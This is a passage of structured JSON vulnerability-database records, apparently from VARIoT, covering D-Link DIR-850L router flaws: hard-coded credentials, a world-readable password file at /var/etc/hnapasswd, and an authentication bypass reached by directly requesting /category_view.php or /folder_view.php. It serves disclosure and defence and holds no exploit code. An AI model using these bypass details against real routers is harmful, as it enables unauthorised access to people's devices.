"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14421"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14421"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"db": "VULHUB",
"id": "VHN-105142"
},
{
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105142"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"date": "2017-09-13T17:29:00.527000",
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31788"
},
{
"date": "2017-09-21T00:00:00",
"db": "VULHUB",
"id": "VHN-105142"
},
{
"date": "2017-09-21T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14421"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008133"
},
{
"date": "2023-11-08T20:59:00.723000",
"db": "NVD",
"id": "CVE-2017-14421"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to the use of hard-coded credentials in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008133"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-574"
}
],
"trust": 0.6
}
}
VAR-201709-0596
Vulnerability from variot - Updated: 2023-12-18 13:14D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/etc/hnapasswd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could use this vulnerability to retrieve a password
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0596",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14425"
}
]
},
"cve": "CVE-2017-14425",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14425",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2017-31784",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-105146",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14425",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14425",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31784",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-570",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105146",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/etc/hnapasswd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could use this vulnerability to retrieve a password",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14425",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31784",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105146",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"id": "VAR-201709-0596",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
}
]
},
"last_update_date": "2023-12-18T13:14:08.036000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100050"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-276",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105146"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14425"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14425"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"db": "VULHUB",
"id": "VHN-105146"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105146"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"date": "2017-09-13T17:29:00.680000",
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31784"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105146"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008100"
},
{
"date": "2023-11-17T20:00:45.137000",
"db": "NVD",
"id": "CVE-2017-14425"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008100"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-570"
}
],
"trust": 0.6
}
}
VAR-201803-1970
Vulnerability from variot - Updated: 2023-12-18 13:08An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version : A1, B1; Firmware Version : 1.02-2.06) devices potentially allows attackers to bypass SharePort Web Access Portal by directly visiting /category_view.php or /folder_view.php. D-Link DIR-850L The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LWirelessAC1200DualBandGigabitCloudRouter is a wireless router product of D-Link. An authentication bypass vulnerability exists in the D-LinkDIR-850LWirelessAC1200DualBandGigabitCloudRouter. An attacker could exploit the vulnerability by bypassing the SharePortWebAccessPortal by directly accessing the /category_view.php or /folder_view.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1970",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.06"
},
{
"model": "dir-850l",
"scope": "gte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "1.02 from 2.06"
},
{
"model": "dir-850l wireless ac1200 dual band gigabit cloud router",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.06",
"versionStartIncluding": "1.02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:a1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:b1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-9032"
}
]
},
"cve": "CVE-2018-9032",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-9032",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-06792",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-9032",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-9032",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-06792",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-992",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
